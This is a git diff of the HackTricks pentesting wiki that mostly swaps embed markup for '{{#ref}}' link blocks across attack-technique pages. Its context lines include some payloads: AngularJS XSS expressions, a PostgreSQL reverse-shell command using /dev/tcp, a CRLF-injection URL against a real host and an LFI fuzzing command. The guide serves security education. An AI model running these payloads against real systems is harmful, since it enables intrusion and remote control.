 [**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users.
 
-{% embed url="https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks" %}
+{{#ref}}
+https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/client-side-template-injection-csti.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## Summary
 
 It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
@@ -26,8 +25,7 @@ In scenarios where user input is dynamically inserted into the HTML body tagged
 
 You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
 
-> [!CAUTION]
-> [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
+> [!CAUTION] > [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
 
 ## VueJS
 
@@ -83,10 +81,8 @@ javascript:alert(1)%252f%252f..%252fcss-images
 
 ## **Brute-Force Detection List**
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/command-injection.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## What is command Injection?
 
 A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.
@@ -132,7 +131,9 @@ powershell C:**2\n??e*d.*? # notepad
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
+{{#endref}}
 
 ## References
 
@@ -140,7 +141,3 @@ powershell C:**2\n??e*d.*? # notepad
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-

src/pentesting-web/crlf-0d-0a.md

@@ -2,8 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-
 ### CRLF
 
 Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS.
@@ -86,7 +84,9 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te
 
 Check more examples in:
 
-{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
+{{#ref}}
+https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
+{{#endref}}
 
 ### HTTP Header Injection
 
@@ -217,9 +217,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj
 - [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
 - [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)
 
-
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/dangling-markup-html-scriptless-injection/README.md

@@ -251,7 +251,9 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt
+{{#endref}}
 
 ## References
 
@@ -261,6 +263,3 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
 - [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md

@@ -258,7 +258,9 @@ This vulnerability, identified as CVE-2019–11358, illustrates how a deep copy
 
 ### Another tutorial with CVEs
 
-{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
+{{#ref}}
+https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2
+{{#endref}}
 
 ### Tools to detect Prototype Pollution
 
@@ -392,6 +394,3 @@ To reduce the risk of prototype pollution, the strategies listed below can be em
 - [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/file-inclusion/README.md

@@ -23,7 +23,9 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 
 **Mixing several \*nix LFI lists and adding more paths I have created this one:**
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
+{{#endref}}
 
 Try also to change `/` for `\`\
 Try also to add `../../../../../`
@@ -34,7 +36,9 @@ A list that uses several techniques to find the file /etc/password (to check if
 
 Merge of different wordlists:
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
+{{#endref}}
 
 Try also to change `/` for `\`\
 Try also to remove `C:/` and add `../../../../../`
@@ -689,6 +693,3 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
 {% file src="../../images/EN-Local-File-Inclusion-1.pdf" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/file-inclusion/phar-deserialization.md

@@ -2,8 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
-
 **Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
 
 The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**.
@@ -69,11 +67,8 @@ php vuln.php
 
 ### References
 
-{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
-
-
+{{#ref}}
+https://blog.ripstech.com/2018/new-php-exploitation-technique/
+{{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/file-upload/README.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## File Upload General Methodology
 
 Other useful extensions:
@@ -200,7 +199,9 @@ Here’s a top 10 list of things that you can achieve by uploading (from [here](
 
 #### Burp Extension
 
-{% embed url="https://github.com/portswigger/upload-scanner" %}
+{{#ref}}
+https://github.com/portswigger/upload-scanner
+{{#endref}}
 
 ## Magic Header Bytes
 
@@ -325,8 +326,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/hacking-jwt-json-web-tokens.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 **Part of this post is based in the awesome post:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\
 **Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool)
 
@@ -245,7 +244,9 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
 
 ### JWT Registered claims
 
-{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}
+{{#ref}}
+https://www.iana.org/assignments/jwt/jwt.xhtml#claims
+{{#endref}}
 
 ### Other attacks
 
@@ -263,10 +264,9 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
 
 ### Tools
 
-{% embed url="https://github.com/ticarpi/jwt_tool" %}
-
+{{#ref}}
+https://github.com/ticarpi/jwt_tool
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-

src/pentesting-web/ldap-injection.md

@@ -4,7 +4,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## LDAP Injection
 
 ### **LDAP**
@@ -216,10 +215,8 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 
 ### More Payloads
 
-{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
-
+{{#ref}}
+https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/oauth-to-account-takeover.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## Basic Information <a href="#d4a8" id="d4a8"></a>
 
 OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server).
@@ -158,7 +157,9 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
 
 For more detailed info about how to abuse AWS cognito check:
 
-{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
+{{#ref}}
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum
+{{#endref}}
 
 ### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
 
@@ -231,8 +232,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po
 - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
 - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
 
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

@@ -241,9 +241,8 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/sql-injection/README.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## What is SQL injection?
 
 An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service.
@@ -143,7 +142,9 @@ Also, if you have access to the output of the query, you could make it **print t
 
 ### Identifying with PortSwigger
 
-{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
+{{#ref}}
+https://portswigger.net/web-security/sql-injection/cheat-sheet
+{{#endref}}
 
 ## Exploiting Union Based
 
@@ -282,7 +283,6 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability.
 
 Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
 
-
 ## Authentication bypass
 
 List to try to bypass the login functionality:
@@ -533,7 +533,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
 
 ### WAF bypass suggester tools
 
-{% embed url="https://github.com/m4ll0k/Atlas" %}
+{{#ref}}
+https://github.com/m4ll0k/Atlas
+{{#endref}}
 
 ## Other Guides
 
@@ -542,10 +544,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
+{{#endref}}
 
 ​
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md

@@ -135,7 +135,9 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
 
 You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with:
 
-{% embed url="https://github.com/Dionach/pgexec" %}
+{{#ref}}
+https://github.com/Dionach/pgexec
+{{#endref}}
 
 ### RCE in Windows
 
@@ -351,6 +353,3 @@ print("    drop function connect_back(text, integer);")
 - [https://www.exploit-db.com/papers/13084](https://www.exploit-db.com/papers/13084)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/ssrf-server-side-request-forgery/README.md

@@ -369,7 +369,9 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
 
 ### To practice
 
-{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
+{{#ref}}
+https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
+{{#endref}}
 
 ## References
 
@@ -379,7 +381,3 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-

src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

@@ -167,7 +167,9 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari
 
 Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header.
 
-{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
+{{#ref}}
+https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
+{{#endref}}
 
 ### Bypass via redirect
 
@@ -221,6 +223,3 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-
 - [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/ssti-server-side-template-injection/README.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## What is SSTI (Server-Side Template Injection)
 
 Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.
@@ -466,8 +465,6 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 
 - More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
-
-
 ##
 
 ### Smarty (PHP)
@@ -1097,7 +1094,9 @@ If you think it could be useful, read:
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
+{{#endref}}
 
 ## Practice & References
 
@@ -1106,6 +1105,3 @@ If you think it could be useful, read:
 - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/unicode-injection/unicode-normalization.md

@@ -79,7 +79,9 @@ Then, a malicious user could insert a different Unicode character equivalent to
 
 #### sqlmap template
 
-{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
+{{#ref}}
+https://github.com/carlospolop/sqlmap_to_unicode_template
+{{#endref}}
 
 ### XSS (Cross Site Scripting)
 
@@ -104,6 +106,3 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
 - [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md

@@ -418,7 +418,9 @@ version="1.0">
 
 ## **Brute-Force Detection List**
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt
+{{#endref}}
 
 ## **References**
 
@@ -427,6 +429,3 @@ version="1.0">
 - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/xss-cross-site-scripting/README.md

@@ -1,6 +1,5 @@
 # XSS (Cross Site Scripting)
 
-
 ## Methodology
 
 1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
@@ -1550,7 +1549,9 @@ shadow-dom.md
 
 ### Polyglots
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
+{{#endref}}
 
 ### Blind XSS payloads
 
@@ -1619,7 +1620,9 @@ console.log(
 
 ### Brute-Force List
 
-{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
+{{#ref}}
+https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
+{{#endref}}
 
 ## XSS Abusing other vulnerabilities
 
@@ -1741,8 +1744,4 @@ other-js-tricks.md
 - [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
 - [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
 
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-web/xxe-xee-xml-external-entity.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## XML Basics
 
 XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.
@@ -228,7 +227,9 @@ For more information check [https://portswigger.net/web-security/xxe/blind](http
 
 In the following awesome github repo you can find **paths of DTDs that can be present in the system**:
 
-{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
+{{#ref}}
+https://github.com/GoSecure/dtd-finder/tree/master/list
+{{#endref}}
 
 Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how.
 
@@ -764,7 +765,9 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 
 ## Tools
 
-{% embed url="https://github.com/luisfontes19/xxexploiter" %}
+{{#ref}}
+https://github.com/luisfontes19/xxexploiter
+{{#endref}}
 
 ## References
 
@@ -777,8 +780,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\
 - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
 
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md

@@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
 
 You can find a better explanation about this technique in the second half of the video:
 
-{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
+{{#ref}}
+https://youtu.be/ADULSwnQs-s?feature=shared
+{{#endref}}
 
 ## Structures
 
@@ -63,6 +65,3 @@ p.interactive()
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md

@@ -21,7 +21,9 @@ rop-syscall-execv.md
 
 For a better explanation check also:
 
-{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
+{{#ref}}
+https://youtu.be/ADULSwnQs-s?feature=shared
+{{#endref}}
 
 ## Example
 
@@ -60,6 +62,3 @@ p.interactive()
 - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/reversing/reversing-tools-basic-methods/README.md

@@ -166,7 +166,9 @@ cheat-engine.md
 
 ## ARM & MIPS
 
-{% embed url="https://github.com/nongiach/arm_now" %}
+{{#ref}}
+https://github.com/nongiach/arm_now
+{{#endref}}
 
 ## Shellcodes
 
@@ -402,7 +404,9 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
 
 ## Game Boy
 
-{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
+{{#ref}}
+https://www.youtube.com/watch?v=VVbRe7wr3G4
+{{#endref}}
 
 ## Courses
 
@@ -410,6 +414,3 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
 - [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/stego/esoteric-languages.md

@@ -52,7 +52,9 @@ Take it to the top
 Whisper my world
 ```
 
-{% embed url="https://codewithrockstar.com/" %}
+{{#ref}}
+https://codewithrockstar.com/
+{{#endref}}
 
 ## PETOOH
 
@@ -67,6 +69,3 @@ Kukarek
 ```
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/todo/burp-suite.md

@@ -10,11 +10,10 @@
 
 [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
 
-{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
+{{#ref}}
+https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
+{{#endref}}
 
 [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/todo/other-web-tricks.md

@@ -24,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi
 
 ### Access Internal servicedesk of companies using atlassian
 
-{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
+{{#ref}}
+https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
+{{#endref}}
 
 ### TRACE method
 
@@ -33,6 +35,3 @@ Developers might forget to disable various debugging options in the production e
 ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/todo/references.md

@@ -1,52 +1,95 @@
 {{#include ../banners/hacktricks-training.md}}
 
-{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
+{{#ref}}
+https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
+{{#endref}}
 
-{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %}
+{{#ref}}
+https://hausec.com/pentesting-cheatsheet/#_Toc475368982
+{{#endref}}
 
-{% embed url="https://anhtai.me/pentesting-cheatsheet/" %}
+{{#ref}}
+https://anhtai.me/pentesting-cheatsheet/
+{{#endref}}
 
-{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
+{{#ref}}
+https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
+{{#endref}}
 
-{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %}
+{{#ref}}
+https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
+{{#endref}}
 
-{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %}
+{{#ref}}
+https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
+{{#endref}}
 
-{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %}
+{{#ref}}
+https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
+{{#endref}}
 
-{% embed url="https://anhtai.me/oscp-fun-guide/" %}
+{{#ref}}
+https://anhtai.me/oscp-fun-guide/
+{{#endref}}
 
-{% embed url="https://www.thehacker.recipes/" %}
+{{#ref}}
+https://www.thehacker.recipes/
+{{#endref}}
 
-{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
+{{#ref}}
+https://github.com/swisskyrepo/PayloadsAllTheThings
+{{#endref}}
 
-{% embed url="https://gtfobins.github.io/" %}
+{{#ref}}
+https://gtfobins.github.io/
+{{#endref}}
 
-{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %}
+{{#ref}}
+https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
+{{#endref}}
 
-{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %}
+{{#ref}}
+https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+{{#endref}}
 
-{% embed url="https://hideandsec.sh/" %}
+{{#ref}}
+https://hideandsec.sh/
+{{#endref}}
 
-{% embed url="https://cheatsheet.haax.fr/" %}
+{{#ref}}
+https://cheatsheet.haax.fr/
+{{#endref}}
 
-{% embed url="https://infosecwriteups.com/" %}
+{{#ref}}
+https://infosecwriteups.com/
+{{#endref}}
 
-{% embed url="https://www.exploit-db.com/" %}
+{{#ref}}
+https://www.exploit-db.com/
+{{#endref}}
 
-{% embed url="https://wadcoms.github.io/" %}
+{{#ref}}
+https://wadcoms.github.io/
+{{#endref}}
 
-{% embed url="https://lolbas-project.github.io" %}
+{{#ref}}
+https://lolbas-project.github.io
+{{#endref}}
 
-{% embed url="https://pentestbook.six2dez.com/" %}
+{{#ref}}
+https://pentestbook.six2dez.com/
+{{#endref}}
 
-{% embed url="https://www.hackingarticles.in/" %}
+{{#ref}}
+https://www.hackingarticles.in/
+{{#endref}}
 
-{% embed url="https://pentestlab.blog/" %}
+{{#ref}}
+https://pentestlab.blog/
+{{#endref}}
 
-{% embed url="https://ippsec.rocks/" %}
+{{#ref}}
+https://ippsec.rocks/
+{{#endref}}
 
